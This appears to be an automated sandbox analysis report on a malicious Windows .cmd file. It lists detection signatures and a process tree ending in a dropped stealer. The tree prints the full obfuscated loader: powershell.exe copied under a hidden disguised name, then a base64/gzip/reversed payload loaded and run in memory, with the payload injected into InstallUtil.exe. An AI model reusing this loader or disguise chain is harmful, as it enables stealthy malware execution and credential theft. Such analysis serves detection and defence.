Windows Analysis Report
849128312.cmd
Overview
General Information
Detection
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Suspicious Copy From or To System Directory
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- cmd.exe (PID: 1848 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\849128312.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 6556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- chcp.com (PID: 5784 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
- cmd.exe (PID: 7140 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo F " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- xcopy.exe (PID: 2608 cmdline: xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\849128312.cmd.Fjz MD5: 39FBFD3AF58238C6F9D4D408C9251FF5)
- attrib.exe (PID: 7128 cmdline: attrib +s +h C:\Users\user\Desktop\849128312.cmd.Fjz MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
- 849128312.cmd.Fjz (PID: 6640 cmdline: C:\Users\user\Desktop\849128312.cmd.Fjz -WindowStyle hidden -command "$Kxrvrz = get-content 'C:\Users\user\Desktop\849128312.cmd' | Select-Object -Last 1; $Rztxxaika = [System.Convert]::FromBase64String($Kxrvrz);$Jjvgcfjmzi = New-Object System.IO.MemoryStream( , $Rztxxaika );$Cheoysx = New-Object System.IO.MemoryStream;$Vrypedkztmk = New-Object System.IO.Compression.GzipStream $Jjvgcfjmzi, ([IO.Compression.CompressionMode]::Decompress);$Vrypedkztmk.CopyTo( $Cheoysx );$Vrypedkztmk.Close();$Jjvgcfjmzi.Close();[byte[]] $Rztxxaika = $Cheoysx.ToArray();[Array]::Reverse($Rztxxaika); $Nlmpmdzvlef = [System.AppDomain]::CurrentDomain.Load($Rztxxaika); $Hncpdnhhl = $Nlmpmdzvlef.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Hncpdnhhl.DeclaringType, $Hncpdnhhl.Name).DynamicInvoke() | Out-Null" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- stealer-CR-0110.exe (PID: 6396 cmdline: "C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe" MD5: 0184F867DE9A072AB7F6CA3E85EB9015)
- InstallUtil.exe (PID: 6020 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
- WerFault.exe (PID: 3116 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1144 MD5: C31336C1EFC2CCB44B4326EA793040F2)
- InstallUtil.exe (PID: 4284 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
- WerFault.exe (PID: 1628 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 2268 MD5: C31336C1EFC2CCB44B4326EA793040F2)
- cleanup
No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | |
| | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | |
| | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | |
| | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | |
| | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | |
| | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | |
| | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | |
| | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | |
| | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | |
System Summary
Source: | Author: Florian Roth (Nextron Systems):